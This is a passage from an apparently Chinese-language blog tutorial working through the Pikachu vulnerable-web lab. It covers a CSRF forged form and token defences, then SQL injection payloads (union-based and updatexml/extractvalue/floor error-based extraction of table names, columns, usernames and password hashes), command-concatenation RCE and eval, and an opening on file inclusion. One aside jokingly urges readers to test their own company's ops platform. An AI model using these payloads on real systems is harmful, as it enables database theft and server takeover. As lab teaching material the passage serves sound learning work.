class="attr">name</span>=<span class="string">&quot;add&quot;</span> <span class="attr">value</span>=<span class="string">&quot;china&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;hacker&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">&quot;postsubmit&quot;</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">name</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;submit&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<h3 id="CSRF-Token"><a href="#CSRF-Token" class="headerlink" title="CSRF Token"></a>CSRF Token</h3><p>CSRF的主要问题是敏感操作的链接容易被伪造，那么如何让这个链接不容易被伪造？</p>
<p>Token的定义：Token是服务端生成的一串字符串，以作客户端进行请求的一个令牌。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/ffde48eea05d4f57977096b8ba15bccd.png" ><br>当我们点击修改个人信息的时候，从url可以看出我们访问了token_get_edit.php，执行后端代码，生成token，并且发送到前端页面，通过hidden属性隐藏起来，放在表单中。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/961526779f4f4048acf978663c324ebe.png" ><br>点击submit时，我们会将从后端发过来的token和我们所要提交的数据，以表单的形式一并发送到后端服务器，后端服务器会验证此token。<br>我们发现在get请求提交的基础上增加了Token，当我们刷新页面时Token值会发生变化，这样也就完全防止了GRSF漏洞的产生。</p>
<p>CRSF漏洞常见防范措施：<br>增加token验证（常用的做法）：<br>　　1、对关键操作增加token参数，token值必须随机，每次都不一样；<br>　　关于安全的会话管理（避免会话被利用，及时关闭登录态）<br>　　1、不要在客户端保存敏感信息（比如身份认证信息）；<br>　　2、测试直接关闭，退出时的会话过期机制；<br>　　3、设置会话过期机制，比如15分钟内无操作，则自动登入超时；<br>　　访问控制安全管理：<br>　　1、敏感信息的修改时需要对身份进行二次认证，比如修改账号时，需要判断旧密码；<br>　　2、敏感信息的修改尽量使用post，而不是get；（post的安全性比get高些）<br>　　3、通过http 头部中的referer来限制原页面<br>　　一般用在登录（防暴力破解），也可以用在其他重要信息操作的表单中（需要考虑可用性）</p>
<h4 id="SQL-Inject（SQL注入漏洞）"><a href="#SQL-Inject（SQL注入漏洞）" class="headerlink" title="SQL-Inject（SQL注入漏洞）"></a>SQL-Inject（SQL注入漏洞）</h4><p>SQL-Inject漏洞原理概述<br>在owasp发布的top10排行榜里，注入漏洞一直是危害排名第一的漏洞，其中注入漏洞里面首当其冲的就是数据库注入漏洞。<br>SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，后台没有做严格的判断，导致其传入的“数据”拼接到SQL语句中，被当做SQL语句的一部分执行。从而导致数据库受损（被拖库，被删除，甚至整个服务器权限沦陷）。</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/e1516c8a5d9f4a7e8c06f6771821837d.png" ></p>
<p>SQL Inject 漏洞攻击流程<br>注入点探测<br>自动方式：使用web漏洞扫描工具，自动进行注入点发现<br>手动方式：手工构造sql inject测试语句进行注入点发现<br>信息收集<br>通过注入点取期望得到的数据<br>（1） 环境信息：数据库类型，数据库版本，操作系统版本，用户信息等<br>（2）数据库信息：数据库名称，数据库表，表字段，字段内容，甚至加密的内容也可能会被破解<br>获取权限<br>获取操作系统权限：通过数据库执行shell，上传木马<br>常见的注入点类型：<br>数字型</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user_id = $id</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>字符型</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">user_id = &#x27;$id&#x27;</span><br><span class="line">``````</span><br><span class="line">搜索型</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>text LIKE ‘%{$_GET[‘search’]}%’”</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">数字型注入（post）</span><br><span class="line">随意点击一个数字，点击查询，会出现如下结果</span><br><span class="line">![](https://img-blog.csdnimg.cn/5d01d992c50f4bdc951a4373488247f3.png)</span><br><span class="line">url中没有传参，提交方式为post。</span><br><span class="line">点击数字1，进行查询，并使用bp抓包</span><br><span class="line">![](https://img-blog.csdnimg.cn/087bb29cfa65410886a8c69c91173b8b.png)</span><br><span class="line">- 全选，然后右键选择发送到Repeater，构造peyload，然后点击发送。</span><br><span class="line">payload:</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>1 or 1 &#x3D; 1</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">1=1永远为true，所以将会遍历出所有用户的邮箱。</span><br><span class="line"></span><br><span class="line">![](https://img-blog.csdnimg.cn/7cab580f9c784254bdfb03d046874307.png)</span><br><span class="line"></span><br><span class="line">点击Render，我们发现查询出了所有用户的邮箱。</span><br><span class="line">![](https://img-blog.csdnimg.cn/88a331d707e643efbb827a66cfe1c6f5.png)</span><br><span class="line">字符型注入（get）</span><br><span class="line">随便输入，点击提交提示用户名不存在，我们可以看到url中显示了我们提交的数据，提交方式为get。</span><br><span class="line">![](https://img-blog.csdnimg.cn/65aa220bea4d43839a06bd41a9de30ea.png)</span><br><span class="line">字符型注入，我们可以猜测sql语句的大概格式</span><br><span class="line">```sql</span><br><span class="line">select 字段1，字段2 from 表名 where username = &#x27;admin&#x27;;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>构造闭合，输入admin’ or 1&#x3D;1#</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 字段1，字段2 from 表名 where username = &#x27;admin&#x27; or 1=1#&#x27;;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>在sql语句中，#为注释符<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/4bc171dac59f4ee58d1ca63de6e3a41a.png" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/0b46eeaa0eeb46c2b2b348043ebc20be.png" ></p>
<p>SQL Injec漏洞手工测试：基于unionl联合查询的信息获取<br>union联合查询：可以通过联合查询来查询指定的数据。<br>用法(我们以pikachu数据库中的member表来举例)<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/ba190e6531dd48969b55888604a204c6.png" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/c284ec52b0e9452eaba52990a74e2106.png" ><br>联合查询的字段数必须和主查询一致！！！！</p>
<p>主查询字段2个（id,email） 联合查询字段三个（username,pw,sex）<br>将会报错，如下：<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/6d019d74ff1d42f290105ef30dc51fe2.png" ><br>但是我们是不知道字段数的，如何猜测字段数呢？<br>使用order by<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/2483387803194a66b83289385a8261bd.png" ><br>查询</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/aa3dda8ea4bd442da5e36c6b8b77e5c9.png" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/99acaece40724680b3444de03db6ea96.png" ><br>再次查询，正常报错，也就是说主查询里有两个字段。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/47b3ff5d929d4a25ab3cf8a3ec35f71b.png" ><br>确认字段后，我们使用联合查询。</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x&#x27; union select database(),user()#</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>如下图，我们查询出了数据库名称和当前用户。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们还可以查询数据库版本。</p>
<p>x’ union select version(),4#<br>我们可以看到数据库版本为：5.7.26，我们输入的4也正常打印了出来。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/f00ced76fb99451ea9161585d3bc0536.png" ></p>
<blockquote>
<p>mysql知识点：<br>select version(); &#x2F;&#x2F;查询数据库版本<br>select database(); &#x2F;&#x2F;查询当前的数据库名称<br>select user(); &#x2F;&#x2F;查询当前登录的用户<br>order by x &#x2F;&#x2F;对查询的结果进行排序，默认数字0-9，字母a-z union select &#x2F;&#x2F;联合查询，必须与主查询的字段个数保持一致。<br>information_schema<br>在mysql中，自带的information_schema数据库里面存放了大量的重要信息。具体如下：<br>如果存在注入点的话，我们可以尝试对该数据库进行访问，从而获取更多的信息。<br>SCHEMATA表：提供了当前mysql实例中所有数据库的信息。<br>TABLES表：提供了表的信息（包括视图）。详细描述了某个表属于哪个 schema，表类型，表引擎，创建时间等信息。<br>COLUMNS表：提供了表中字段的信息。</p>
</blockquote>
<p>搜索型注入<br>输入字符k，搜索<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/2fae69d59b7a4f65a17b8228d52d774c.png" ><br>返回了所有含有k的用户。</p>
<div class="code-container" code-lang="Sql"><div class="codebox"><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">from</span> 表名 <span class="keyword">where</span> username <span class="keyword">like</span> <span class="string">&#x27;%k%&#x27;</span>;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>这种查询比get多了%号，我们同样构造闭合。</p>
<p>payload：k%’ or 1&#x3D;1#     注意or的两边要有空格，这是sql规定的语法格式，否则将报错<br>select from 表名 where username like ‘%k%’ or 1&#x3D;1 #%’;<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/ab1b7123ae43450f906b0316b480d6b0.png" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/3cf8ff5269e64345b773cec5ec9fdf49.png" ></p>
<p>xx型注入<br>查看后端源码<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/16a2b2cf32484ea1b73988f97ba144ce.png" ><br>想办法构造闭合<br>select id,email from member where username&#x3D;(‘$name’);<br>payload:   xx’) or 1&#x3D;1#<br>select id,email from member where username&#x3D;(‘xx’) or 1&#x3D;1#’);<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/6349c722b8c94374974ca7a7c727a4b6.png" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/fbd2e85f2df24ecb940c68f3e068c740.png" ></p>
<p>SQL Inject漏洞手工测试：基于报错的信息获取(select&#x2F;delete&#x2F;update&#x2F;insert)<br>技巧思路：<br>在mysql中使用一些指定的函数来制造报错，从而从报错信息中获取设定的信息。<br>select&#x2F;insert&#x2F;update&#x2F;delete都可以使用报错来获取信息。<br>背景条件：<br>后台没有屏蔽数据库报错信息，在语法发生错误时回输出在前端。</p>
<p>基于报错的信息获取————三个常用的用来报错的函数<br>updatexml():函数是MySQL对XML文档数据进行查询和修改的XPATH函数。<br>extractvalue():函数也是MySQL对XML文档数据进行查询和修改的XPATH函数。<br>floor():MYSQL中用来取整的函数。</p>
<p>updatexml()<br>updatexml()函数作用：改变（查找并替换）XML文档中符合条件的节点的值。<br>语法：UPDATEXML(xml document,XPathstring,new_value)</p>
<p>第一个参数: filedname是String格式，为表中的字段名。<br>第二个参数: XPathstring (Xpath格式的字符串)。<br>第三个参数: new. value，String格式，替换查找到的符合条件的</p>
<p>Xpath定位必须是有效的，否则会发生错误<br>select下报错的利用演示<br>我们还是那字符型注入做演示，首先我们应该判断有没有报错，会不会在前端显示。我们输入单引号，发现有注入报错。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/7305529e750c42808b5416ad18ae2497.png" ><br>现在我们构造一个报错。</p>
<p>kobe’ and updatexml(1,version(),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/ac5259ea8591495cbbaabf83bfdf079a.png" ><br>但是并没有把version对应的版本号打印出来， 接下来修改payload。</p>
<p>kobe’ and updatexml(1,concat(0x7e,version()),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://img-blog.csdnimg.cn/214d6d3177b44e98a44fffee5385eb80.png" ><br>我们获取到了版本号，现在我们可以把version替换成任意我们想要获取的信息。</p>
<p>kobe’ and updatexml(1,concat(0x7e,database()),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们进一步查询数据库中的表</p>
<p>kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema&#x3D;’pikachu’)),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>报错返回的数据多余一行。说明报错有多行。再次进行处理。可以使用limit一次一次进行获取表名。</p>
<p>kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema&#x3D;’pikachu’ limit 0,1)),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" >我们可以得到第一个表名。想要得到第二个表名只要把0改成1即可。依此类推，可以得到所有表名。</p>
<p>kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema&#x3D;’pikachu’ limit 1,1)),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>在获取表名之后，思路一样，获取列名。</p>
<p>kobe’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name&#x3D;’users’ limit 0,1)),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>同样的依此类推，得到所有列名。在获取列名后，再来获取数据。</p>
<p>kobe’ and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>获取了第一个用户名，再根据用户名查询密码。</p>
<p>kobe’ and updatexml(1,concat(0x7e,(select password from users where username&#x3D;’admin’ limit 0,1)),0)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>获取MD5加密的密文，解密获取明文密码。</p>
<p>“insert&#x2F;update”注入<br>点击注册<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>一样的方法判断是否有SQL注入漏洞，经过判断之后发现存在SQL漏洞。重点在于怎么构造insert的payload。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>zzzz’ or updatexml(1,concat(0x7e,database()),0) or ‘<br>密码随意。点击提交。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>得到数据库名。思路一样把database做替换，得到想要的信息。<br>update与insert是一模一样的。我们先登录用户。</p>
<p>在这里可能会有人显示不出来信息，可以参考解决方案。 在使用pikachu的时候发现一点问题，好像是由php版本较高导致的不兼容，如图：<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>在这里我们打开这个路径，找到第66行，把MYSQL_ASSOC改成MYSQLI_ASSOC，保存文件，刷新网页。就可以啦。<br>原因：在php7中，MYSQL_ASSOC不再是一个常量，将<br>MYSQL_ASSOC改为MYSQLI_ASSOC，意思是mysqli的方式提取数组，而不再是mysql<br>（原因：mysql_fetch_arrayhan函数转为mysqli_fetch_array，参数没有修改）</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>这个修改就是通过update。这里就存在update漏洞。我们输入刚刚的payload。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>爆出数据库名称，之后逻辑就一样了。</p>
<p>“delete”注入<br>删除留言并使用bp抓包<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>发送给repeater<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们可以把id构成闭合。<br>1 or updatexml(1,concat(0x7e,database()),0)<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ></p>
<p>点击发送<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>按照我们的期望返回了数据库名称。<br>extractvalue()<br>extractvalue()函数作用:从目标XML中返回包含所查询值的字符串。<br>语法: ExtractValue(xm| <em>document, xpath. string)<br>第一个参数: XML document是String格式，为XML文档对象的名称,文中为Doc<br>第二个参数: XPath</em> string (Xpath格式的字符串)</p>
<p>Xpath定位必须是有效的,否则会发生错误。<br>打开字符型注入，输入payload。</p>
<p>kobe’ and extractvalue(0,concat(0x7e,version()))#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>效果差不多，理解即可。<br>floor()<br>在字符型中输入payload得到版本号。</p>
<p>kobe’ and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>同样进行替换我们可以得到其他你想知道的东西。</p>
<p>“http header”注入<br>RCE(远程命令执行&#x2F;远程代码执行)<br>RCE(remote command&#x2F;code execute)概述：<br>RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。<br>远程系统命令执行<br>一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口<br>比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上<br>一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。 而，如果，设计者在完成该功能时，没有做严格的安全控制，则可能会导致攻击者通过该接口提交“意想不到”的命令，从而让后台进行执行，从而控制整个后台服务器<br>现在很多的甲方企业都开始实施自动化运维,大量的系统操作会通过”自动化运维平台”进行操作。 在这种平台上往往会出现远程系统命令执行的漏洞,不信的话现在就可以找你们运维部的系统测试一下,会有意想不到的”收获”-_-<br>远程代码执行<br>同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。<br>因此，如果需要给前端用户提供操作类的API接口，一定需要对接口输入的内容进行严格的判断，比如实施严格的白名单策略会是一个比较好的方法。<br>你可以通过“RCE”对应的测试栏目，来进一步的了解该漏洞。</p>
<p>我们首先输入127.0.0.1进行ping<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>乱码是因为编码方式，我们只要看到ping出东西就可以了。<br>接下来我们输入 127.0.0.1 &amp; ipconfig<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>说明这里除了可以提交目标IP地址外，还可以通过一些拼接的符号执行其他的命令。</p>
<p>下面来到“eval”，eval函数可以把字符串当成 PHP 代码来执行。<br>输入phpinfo(); 点击提交<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>我们可以看到函数得以执行。<br>那么这里学习一个php函数<br>system(“”)：直接执行操作系统命令，例如system(“ipconfig”)<br>File Inclusion(文件包含漏洞)<br>文件包含漏洞概述：<br>在Web后台开发中，程序员往往为了提高效率以及让代码看起来更加简洁，会使用“包含”函数功能，比如把 一系列功能函数都写进function.php中，之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码。<br>但有些时候，因为网站功能需求，会让前端用户选择需要包含的文件（或者在前端的功能中使用了“包含”功能），又由于开发人员没有对要包含的这个文件进行安全考虑，就导致攻击者可以通过修改包含文件的位置来让后台执行任意文件（代码）。<br><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/" ><br>通过Include（）或require（）语句，可以将PHP文件的内容插入到另一个PHP文件（在服务器执行它之前）。<br>include和require语句是相同的，除了错误处理方面：<br>require会生成致命错误（E_COMPILE ERROR）并停止脚本执行<br>include只生成警告（E WARNING），并且脚本会继续执行</p>
